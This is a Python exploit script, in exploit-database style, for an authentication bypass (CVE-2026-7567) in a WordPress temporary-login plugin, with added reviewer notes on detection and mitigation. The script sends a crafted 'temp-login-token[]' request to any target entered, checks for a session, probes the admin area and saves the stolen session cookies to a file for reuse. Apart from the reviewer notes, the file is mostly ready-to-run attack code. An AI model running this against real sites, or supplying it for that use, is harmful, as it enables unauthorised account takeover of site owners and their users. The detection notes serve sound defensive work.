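#!/usr/bin/env python3
# Exploit Title: Wordpress Temporary Login Plugin 1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/temporary-login.1.0.0.zip
# Version: <= 1.0.0
# Tested on: Linux
# CVE : CVE-2026-7567
#
# Reviewer notes:
#   * What the script does: a single GET to wp-admin/ carrying the query
#     parameter `temp-login-token[]` (array form, no value), followed by a
#     look at the cookies that come back.
#   * Root cause is not shown on this page. Presumably the plugin's token
#     check mishandles a non-string parameter value -- confirm against the
#     plugin source before relying on that explanation.
#   * Detection: search web-server access logs for requests whose query
#     string contains `temp-login-token[]` (URL-encoded form:
#     `temp-login-token%5B%5D`), and review sessions opened for temporary
#     users around those timestamps.
#   * Mitigation: the header lists versions <= 1.0.0 as affected. Update to a
#     fixed release if one is available; otherwise deactivate the plugin.
#     The failure text below lists "No temporary users exist" as a reason the
#     request does nothing, so removing unused temporary users also removes
#     the precondition.
#   * A negative result from this script is not evidence that a site is
#     safe; confirm the installed plugin version instead.

import os

import requests

# Without an explicit timeout requests will wait indefinitely on a stalled host.
REQUEST_TIMEOUT = 15  # seconds
COOKIE_FILE = "wordpress_cookies.txt"

# The banner is rebuilt from its text lines so the box stays aligned.
BANNER_WIDTH = 81
banner_text = [
    "Temporary Login Plugin <= 1.0.0 - 'temp-login-token' Authentication Bypass",
    "BY: Amir Hossein Jamshidi",
    "Mail: amirhosseinjamshidi64@gmail.com",
    "github: https://github.com/amirhosseinjamshidi64",
    "Usage: python Exploit.py",
]
bar = "#" * BANNER_WIDTH
print("\n" + "\n".join(
    [bar] + [f"# {line:<{BANNER_WIDTH - 4}} #" for line in banner_text] + [bar]
) + "\n")

# Target URL - CHANGE THIS to your WordPress URL
target = input("Enter Target (example: https://evil.com/): ").strip()
# The path is appended by plain concatenation, so a base URL entered without
# a trailing slash would otherwise yield a malformed URL.
if not target.endswith("/"):
    target += "/"
url = target + "wp-admin/?temp-login-token[]"

print("[*] Sending exploit request...")
try:
    response = requests.get(url, allow_redirects=True, timeout=REQUEST_TIMEOUT)
except requests.RequestException as exc:
    # Report connection/TLS/timeout problems as a message, not a traceback.
    raise SystemExit(f"[-] Request failed: {exc}")

print(f"[*] Final URL: {response.url}")
print(f"[*] Response status: {response.status_code}")

# Check if we got admin cookies.
# NOTE(review): this is a heuristic. `wp-settings-time` is WordPress's
# per-user settings cookie rather than the authentication cookie itself, so a
# hit is an indicator of a session, not proof of one.
if 'wp-settings-time' in str(response.cookies):
    print("[✓] SUCCESS! Authentication bypassed!")
    print("[✓] WordPress logged-in cookie found")

    # Try to access admin area with the same session
    try:
        admin_check = requests.get(
            response.url.replace('wp-login.php', 'wp-admin/'),
            cookies=response.cookies,
            timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException as exc:
        raise SystemExit(f"[-] Admin check failed: {exc}")

    # The requested URL always contains "wp-admin", and so does the
    # redirect_to parameter of a bounce to the login form; without excluding
    # wp-login.php the URL test would report admin access on every run.
    bounced_to_login = 'wp-login.php' in admin_check.url
    if not bounced_to_login and (
        'Dashboard' in admin_check.text or 'wp-admin' in admin_check.url
    ):
        print("[✓] Full admin access confirmed!")
        print("[✓] You are now logged in as a temporary user")
    else:
        print("[!] Logged in but no admin access (user may have limited role)")
else:
    print("[-] Exploit failed. Reasons:")
    print("    - Plugin not installed or not version 1.0.0")
    print("    - No temporary users exist")
    print("    - Plugin is patched")

# Save cookies for manual browsing.
# Session cookies are credentials: the file is created owner-read/write only
# (the mode applies when the file is first created) and is skipped entirely
# when the server returned no cookies. Delete it once testing is finished.
if response.cookies:
    fd = os.open(COOKIE_FILE, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w') as f:
        for cookie in response.cookies:
            f.write(f"{cookie.name}={cookie.value}\n")
    print("[*] Cookies saved to wordpress_cookies.txt")
else:
    print("[*] No cookies returned; nothing saved")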